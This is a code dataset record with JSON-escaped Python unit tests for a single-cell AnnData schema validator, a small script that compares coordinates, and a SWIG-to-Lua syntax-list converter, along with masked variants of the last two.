self.validator.adata.obs[\"disease_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'disease_ontology_term_id' is not a \"\n \"valid ontology term id of 'MONDO, PATO'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ],\n )\n\n # Invalid PATO term id\n self.validator.errors = []\n self.validator.adata.obs[\"disease_ontology_term_id\"][0] = \"PATO:0001894\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'PATO:0001894' in 'disease_ontology_term_id' is not an allowed term: '[['PATO:0000461']]'. \"\n \"Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ],\n )\n\n def test_ethnicity_ontology_term_id(self):\n\n \"\"\"\n ethnicity_ontology_term_id categorical with str categories.\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be either a HANCESTRO term or \"unknown\" if unavailable.\n Otherwise, for all other organisms this MUST be \"na\".\n \"\"\"\n\n # If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n # this MUST be either a HANCESTRO term or \"unknown\" if unavailable.\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:9606\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is \"\n \"not a valid ontology term id of 'HANCESTRO'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' \"\n \"(Homo sapiens), ethnicity_ontology_term_id MUST be a term id of 'HANCESTRO' or 'unknown'.\"\n ],\n )\n\n # Otherwise, for all other organisms this MUST be \"na\". Below is the test case for mouse data.\n # development_stage_ontology_term_id has to be set to an appropriate mouse term id, otherwise there\n # will be an error in that field.\n self.validator.errors = []\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:10090\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"MmusDv:0000003\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is not a \"\n \"valid value of 'ethnicity_ontology_term_id'. When 'organism_ontology_term_id' is NOT 'NCBITaxon:9606' \"\n \"(Homo sapiens), ethnicity_ontology_term_id MUST be 'na'.\"\n ],\n )\n\n def test_organism_ontology_term_id(self):\n\n \"\"\"\n organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.\n \"\"\"\n\n # Setting \"organism_ontology_term_id\" to \"EFO:0000001\" is the fail case. However since this represents neither\n # human nor mouse, then two other columns that are dependent on it need to be set appropriately to avoid\n # other error messages: \"development_stage_ontology_term_id\" and \"ethnicity_ontology_term_id\"\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][0] = \"unknown\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"na\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid \"\n \"ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed.\"\n ],\n )\n\n def test_tissue_ontology_term_id_base(self):\n\n \"\"\"\n tissue_ontology_term_id categorical with str categories. This MUST be the term that best describes the tissue\n that this cell was derived from, depending on the type of biological sample:\n \"\"\"\n\n self.validator.adata.obs[\"tissue_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'tissue_ontology_term_id' is not a \"\n \"valid ontology term id of 'UBERON, CL'.\"\n ],\n )\n\n def test_tissue_ontology_term_id_cell_culture(self):\n\n \"\"\"\n Cell Culture - MUST be a CL term appended with \" (cell culture)\"\n \"\"\"\n\n self.validator.adata.obs[\"tissue_ontology_term_id\"][\n 0\n ] = \"CL:0000057 (CELL culture)\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'CL:0000057 (CELL culture)' in 'tissue_ontology_term_id' is \"\n \"not a valid ontology term id of 'UBERON, CL'.\"\n ],\n )\n\n def test_tissue_ontology_term_id_organoid(self):\n\n \"\"\"\n Organoid - MUST be an UBERON term appended with \" (organoid)\"\n \"\"\"\n\n self.validator.adata.obs[\"tissue_ontology_term_id\"][0] = \"CL:0000057 (ORGANOID)\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'CL:0000057 (ORGANOID)' in 'tissue_ontology_term_id' is \"\n \"not a valid ontology term id of 'UBERON, CL'.\"\n ],\n )\n\n def test_sex_ontology_term_id(self):\n\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n\n self.validator.adata.obs[\"sex_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is \"\n \"not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', \"\n \"or 'unknown' are allowed.\"\n ],\n )\n\n def test_is_primary_data(self):\n\n \"\"\"\n is_primary_data\tbool. This MUST be True if this is the canonical instance of this cellular\n observation and False if not. This is commonly False\n for meta-analyses reusing data or for secondary views of data.\n \"\"\"\n\n self.validator.adata.obs[\"is_primary_data\"] = \"FALSE\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Column 'is_primary_data' in dataframe 'obs' \"\n \"must be boolean, not 'object'.\"\n ],\n )\n\n\nclass TestVar(unittest.TestCase):\n\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n\n \"\"\"\n var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.\n \"\"\"\n\n # Swap first row for second one\n var = Validator.getattr_anndata(self.validator.adata, \"var\")\n\n # First swap the index\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n\n # Then swap the actual rows\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n\n self.validator.validate_adata()\n print(\"FOO\", self.validator.errors)\n self.assertEqual(\n self.validator.errors,\n [\"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"],\n )\n\n def test_check_unique_var(self):\n\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n\n for component_name in [\"var\", \"raw.var\"]:\n with self.subTest(component_name=component_name):\n\n # Resetting validator\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n\n # Duplicate 1st row in var and assign it to 2nd\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ],\n )\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n\n columns = [\"feature_is_filtered\", \"feature_biotype\"]\n\n for component_name in [\"var\", \"raw.var\"]:\n for column in columns:\n if column == \"feature_is_filtered\" and component_name == \"raw.var\":\n continue\n with self.subTest(component_name=component_name, column=column):\n\n # Resetting validator\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n component.drop(column, axis=1, inplace=True)\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: Dataframe '{component_name}' is missing \"\n f\"column '{column}'.\"\n ],\n )\n\n def test_feature_is_filtered(self):\n\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n\n # Duplicate 1st row in var and assigned to 2nd\n self.validator.adata.var[\"feature_is_filtered\"][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', \"\n \"but there are 1 non-zero values in the corresponding columns of the matrix 'X'. \"\n \"All values for these features must be 0.\"\n ],\n )\n\n def test_columns_not_in_raw_var(self):\n\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns[\"X_normalization\"] = \"CPM\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"],\n )\n\n def test_feature_id_wrong_format(self):\n\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n\n for component_name in [\"var\", \"raw.var\"]:\n with self.subTest(component_name=component_name):\n\n # Resetting validator\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n\n new_index = list(component.index)\n new_index[0] = \"ENSEBML_NOGENE\"\n component.set_index(pd.Index(new_index), inplace=True)\n component[\"feature_biotype\"][0] = \"gene\"\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' \"\n f\"in '{component_name}', make sure it is a valid ID.\"\n ],\n )\n\n def test_feature_id_non_existent_ensembl(self):\n\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n\n for component_name in [\"var\", \"raw.var\"]:\n with self.subTest(component_name=component_name):\n # Resetting validator\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n\n new_index = list(component.index)\n new_index[0] = \"ENSG000\"\n component.set_index(pd.Index(new_index), inplace=True)\n component[\"feature_biotype\"][0] = \"gene\"\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ],\n )\n\n def test_feature_id_non_existent_ercc(self):\n\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n\n for component_name in [\"var\", \"raw.var\"]:\n with self.subTest(component_name=component_name):\n # Resetting validator\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n\n new_index = list(component.index)\n new_index[0] = \"ERCC-000000\"\n component.set_index(pd.Index(new_index), inplace=True)\n component[\"feature_biotype\"][0] = \"spike-in\"\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ],\n )\n\n\nclass TestUns(unittest.TestCase):\n\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n\n del self.validator.adata.uns[\"schema_version\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: adata has no schema definition in 'adata.uns'. \"\n \"Validation cannot be performed.\"\n ],\n )\n\n def test_required_fields_title(self):\n\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n\n del self.validator.adata.uns[\"title\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors, [\"ERROR: 'title' in 'uns' is not present.\"]\n )\n\n def test_required_fields_X_normalization(self):\n\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n\n del self.validator.adata.uns[\"X_normalization\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors, [\"ERROR: 'X_normalization' in 'uns' is not present.\"]\n )\n\n def test_leading_trailing_double_spaces_in_strings(self):\n\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n\n self.validator.adata.uns[\"title\"] = \" There is a leading space\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ],\n )\n\n self.validator.adata.uns[\"title\"] = \"There is a trailing space \"\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ],\n )\n\n self.validator.adata.uns[\"title\"] = \"There are double spaces\"\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ],\n )\n\n def test_schema_version(self):\n\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n\n self.validator.adata.uns[\"schema_version\"] = \"1.0.0\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. \"\n \"Validation cannot be performed.\"\n ],\n )\n\n def test_title(self):\n\n \"\"\"\n Title MUST be a string\n \"\"\"\n\n # list instead of string\n self.validator.adata.uns[\"title\"] = [\"title\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: '['title']' in 'uns['title']' is not valid, \"\n \"it must be a string.\"\n ],\n )\n\n def test_X_normalization_is_str(self):\n\n \"\"\"\n X_normalization str.\n \"\"\"\n\n # list instead of string\n self.validator.adata.uns[\"X_normalization\"] = [\"normalization\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is \"\n \"not valid, it must be a string.\"\n ],\n )\n\n def test_X_normalization_not_raw(self):\n\n \"\"\"\n X_normalization str. This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n\n # Assign a real value to X while X_normalization is 'none'\n del self.validator.adata.raw\n self.validator.adata.uns[\"X_normalization\"] = \"none\"\n self.validator.validate_adata()\n print(\"FOO\", self.validator.warnings)\n self.assertEqual(\n self.validator.warnings,\n [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear \"\n \"to have raw counts (integers)\"\n ],\n )\n\n def test_batch_condition_is_list(self):\n\n \"\"\"\n batch_condition list[str]\n \"\"\"\n\n # Check valid case of numpy array which is interchangeable with lists\n self.validator.adata.uns[\"batch_condition\"] = numpy.array(\n self.validator.adata.uns[\"batch_condition\"]\n )\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n\n # Check fail case: not a list nor numpy array\n self.validator.adata.uns[\"batch_condition\"] = \"cell_type_ontology_term_id\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' \"\n \"is not valid, it must be a list or numpy array.\"\n ],\n )\n\n def test_batch_condition_is_column_from_obs(self):\n\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n\n self.validator.adata.uns[\"batch_condition\"] = [\"NO_COLUMN\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a \"\n \"column in 'adata.obs'.\"\n ],\n )\n\n def test_default_embedding_is_str(self):\n\n \"\"\"\n Default_embedding str.\n \"\"\"\n\n self.validator.adata.uns[\"default_embedding\"] = [\"X_umap\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, \"\n \"it must be a string.\"\n ],\n )\n\n def test_default_embedding_is_key_from_obsm(self):\n\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n\n self.validator.adata.uns[\"default_embedding\"] = \"X_other\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, \"\n \"it must be a key of 'adata.obsm'.\"\n ],\n )\n\n def test_X_approximate_distribution_is_str(self):\n\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n\n # Check valid case of \"count\" which is not included in valid object\n self.validator.adata.uns[\"X_approximate_distribution\"] = \"count\"\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n\n # Invalid type: list\n self.validator.adata.uns[\"X_approximate_distribution\"] = [\"count\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' \"\n \"is not valid, it must be a string.\"\n ],\n )\n\n def test_X_approximate_distribution_is_valid(self):\n\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n\n self.validator.adata.uns[\"X_approximate_distribution\"] = \"COUNT\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is \"\n \"not valid. Allowed terms: ['count', 'normal'].\"\n ],\n )\n\n\nclass TestObsm(unittest.TestCase):\n\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n\n self.validator.adata.obsm[\"X_tsne\"] = pd.DataFrame(\n self.validator.adata.obsm[\"X_umap\"], index=self.validator.adata.obs_names\n )\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, \"\n \"'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ],\n )\n\n def test_obsm_values_at_least_one_X(self):\n\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n\n self.validator.adata.obsm[\"umap\"] = self.validator.adata.obsm[\"X_umap\"]\n self.validator.adata.uns[\"default_embedding\"] = \"umap\"\n del self.validator.adata.obsm[\"X_umap\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: At least one embedding in 'obsm' has to have a \"\n \"key with an 'X_' prefix.\"\n ],\n )\n\n def test_obsm_shape(self):\n\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n\n # Makes 1 column array\n self.validator.adata.obsm[\"X_umap\"] = numpy.delete(\n self.validator.adata.obsm[\"X_umap\"], 0, 1\n )\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: All embeddings must have as many rows as cells, and \"\n \"at least two columns.'adata.obsm['X_umap']' has shape \"\n \"of '(2, 1)'.\"\n ],\n )\n\n\nclass TestAddingLabels(unittest.TestCase):\n\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n\n # Manually created data (positive control)\n cls.adata_with_labels = examples.adata_with_labels\n\n # Validate test data\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n\n # Add labels through validator\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n\n for column in [\"feature_name\", \"feature_reference\"]:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. \" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n\n for column in [\n \"assay\",\n \"cell_type\",\n \"development_stage\",\n \"disease\",\n \"ethnicity\",\n \"organism\",\n \"sex\",\n \"tissue\",\n ]:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-ids": [
43,
45,
50,
57,
75
]
}
|
[
43,
45,
50,
57,
75
] |
__author__ = 'NikolaiEgorov'
def Lad(a1, a2, b1, b2):
if (a1 == b1) | (a2 == b2):
return 'YES'
else:
return 'NO'
a1 = int(input())
a2 = int(input())
b1 = int(input())
b2 = int(input())
print(Lad(a1, a2, b1, b2))
|
normal
|
{
"blob_id": "0f55b598058b65c9dbf9cd4761d1ff6fc7091b19",
"index": 8791,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Lad(a1, a2, b1, b2):\n if (a1 == b1) | (a2 == b2):\n return 'YES'\n else:\n return 'NO'\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef Lad(a1, a2, b1, b2):\n if (a1 == b1) | (a2 == b2):\n return 'YES'\n else:\n return 'NO'\n\n\n<mask token>\nprint(Lad(a1, a2, b1, b2))\n",
"step-4": "__author__ = 'NikolaiEgorov'\n\n\ndef Lad(a1, a2, b1, b2):\n if (a1 == b1) | (a2 == b2):\n return 'YES'\n else:\n return 'NO'\n\n\na1 = int(input())\na2 = int(input())\nb1 = int(input())\nb2 = int(input())\nprint(Lad(a1, a2, b1, b2))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#! /usr/bin/python
#
# convert the swig -debug-lsymbols output text file format into
# a simple list of lua module names and classes
#
# Dan Wilcox <[email protected]> 2017
#
import sys
import re
if len(sys.argv) < 2:
print("USAGE: lua_syntax.py MODULENAME INFILE")
exit(0)
module = sys.argv[1]
infile = sys.argv[2]
sections = []
sectionMatches = [
"string", # swig std::string wrappers
"string.SwigStatic" # swig std::string wrappers
]
sectionEnds = [
"Vector" # swig std::vector wrappers
]
lineMatches = [
"string", # swig std::string wrappers
"lua:cdata", # c pointers
]
lineStarts = [
"~", # destructors
"__", # lua metatable __add, __sub, etc
"of", # of core type prefixes
"ofx" # ofx addon type prefixes
]
lineEnds = [
"Vector" # swig std::vector wrappers
]
# any other user-supplied section ignores
for arg in sys.argv[3:]:
sectionIgnores.append(arg)
# check if a string matches one in an array
def matches(needle, haystack):
for straw in haystack:
if needle == straw:
return True
return False
# append a section to the sections array if the name passes muster
def appendSection(section):
# drop static classes which don't have any symbols
if len(section) < 2:
return
# section names are followed by a " -", so double check
if not section[0].endswith("-"):
print("warning: section name does not end with -: "+section[0])
return
# grab first non-whitespace name ie. "Color" from "Color -"
match = re.match("\S+", section[0])
if match:
if section[0] == "-": # main module is just a "-"
section[0] = module
else: # class name
section[0] = match.group(0)
else:
print("warning: section name had no non-whitespace match: "+section[0])
return
# drop sections which match certain strings
if matches(section[0], sectionMatches):
return
# drop sections which contain certain strings
if any(section[0].endswith(x) for x in sectionEnds):
return
# if got this far, the section must be good...
sections.append(section)
# parse swig output into sections
file = open(infile)
section = []
for line in file:
# strip whitespace
line = line.strip()
# ignore beginning and end lines
if line.startswith("LANGUAGE"):
continue
# section headers are a series of = chars, ie. ==========
if line.startswith("="):
appendSection(section)
section = []
# append line within a section
else:
# empty line
if len(line) == 0:
continue
# drop lines with certain prefixes
if any(line.startswith(x) for x in lineStarts):
continue
# drop lines with certain suffixes
if any(line.endswith(x) for x in lineEnds):
continue
# drop lines which match certain strings
if matches(line, lineMatches):
continue
# line must be good
section.append(line)
appendSection(section) # catch any left overs
file.close()
section = []
# for section in sections:
# print(section)
# exit(0)
# output module & section names to each section line
file = open(module+"_syntax.txt", "w")
num = 0
for section in sections:
# grab name from first line and output
prefix = " "
name = section[0]
if name == module: # main module
prefix = module+"."
file.write(module+"\n")
elif name.endswith(".SwigStatic"): # static members
name = name.split(".")[0] # drop SwigStatic suffix
prefix = module+"."+name+"."
else: # class instance members
file.write(module+"."+name+"\n")
# sort remaining lines
lines = section[1:]
lines.sort()
# output with module.class prefix
for line in lines:
if not line.endswith(".SwigStatic"): # drop statics from main module
file.write(prefix+line+"\n")
num = num + 1
# linebreak between sections
if num < len(sections):
file.write("\n")
file.close()
|
normal
|
{
"blob_id": "c712875273f988a3aa6dab61f79e99a077823060",
"index": 807,
"step-1": "<mask token>\n\n\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n\ndef appendSection(section):\n if len(section) < 2:\n return\n if not section[0].endswith('-'):\n print('warning: section name does not end with -: ' + section[0])\n return\n match = re.match('\\\\S+', section[0])\n if match:\n if section[0] == '-':\n section[0] = module\n else:\n section[0] = match.group(0)\n else:\n print('warning: section name had no non-whitespace match: ' +\n section[0])\n return\n if matches(section[0], sectionMatches):\n return\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n sections.append(section)\n\n\n<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) < 2:\n print('USAGE: lua_syntax.py MODULENAME INFILE')\n exit(0)\n<mask token>\nfor arg in sys.argv[3:]:\n sectionIgnores.append(arg)\n\n\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n\ndef appendSection(section):\n if len(section) < 2:\n return\n if not section[0].endswith('-'):\n print('warning: section name does not end with -: ' + section[0])\n return\n match = re.match('\\\\S+', section[0])\n if match:\n if section[0] == '-':\n section[0] = module\n else:\n section[0] = match.group(0)\n else:\n print('warning: section name had no non-whitespace match: ' +\n section[0])\n return\n if matches(section[0], sectionMatches):\n return\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n sections.append(section)\n\n\n<mask token>\nfor line in file:\n line = line.strip()\n if line.startswith('LANGUAGE'):\n continue\n if line.startswith('='):\n appendSection(section)\n section = []\n else:\n if len(line) == 0:\n continue\n if any(line.startswith(x) for x in lineStarts):\n continue\n if any(line.endswith(x) for x in lineEnds):\n continue\n if matches(line, lineMatches):\n continue\n 